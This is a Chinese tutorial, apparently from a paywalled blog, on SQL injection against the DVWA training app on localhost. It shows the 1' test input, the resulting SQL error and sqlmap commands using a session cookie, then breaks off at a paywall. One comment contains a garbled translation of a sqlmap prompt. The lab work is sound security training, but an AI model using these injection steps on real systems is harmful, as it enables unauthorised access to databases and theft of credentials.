看到这篇文章,相信大家对于DVWA的搭建已经没问题了吧,在这里就不在赘述DVWA的搭建过程。
SQLMap之dvwa简单使用实例:
一、首先肯定是要判断是否有注入漏洞,在输入框输入1,返回
ID: 1
First name: admin
Surname: admin

返回正常;
再次输入1',报错,返回
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1

此时可以断定有SQL注入漏洞,下面利用SQLMap进行注入攻击。
二、利用SQLMap工具
<①>
python sqlmap.py -u "localhost:82/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit"
# -u " "参数--URL,进行测试,
# 提示:
sqlmap got a 302 redirect to 'http://localhost:82/DVWA-master/login.php'. Do you want to follow? [Y/n]
# (SqLMAP得到302重定向到“http://LoalHoo:/DVWAuthMistal/Logial.php”。你想跟上吗?[y/n])
# 根据该提示,可以判断(302重定向)跳转至登录页面,看来需要带cookie

python sqlmap.py -u "localhost:82/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie "F12→→Console→→document.cookie得到当前页面cookie"
# 得到数据库类型版本(MySQL),服务器类型版本(Apache,PHP)
# the back-end DBMS is MySQL &n

本文介绍了如何利用SQLMap工具检测和利用DVWA中的LOW级别SQL注入漏洞。通过输入测试数据确定存在注入后,使用SQLMap进行一系列操作,包括识别数据库类型、获取数据库名、查看表及列信息,并最终通过字典攻击获取用户密码。
最低0.47元/天 解锁文章
8568

被折叠的 条评论
为什么被折叠?



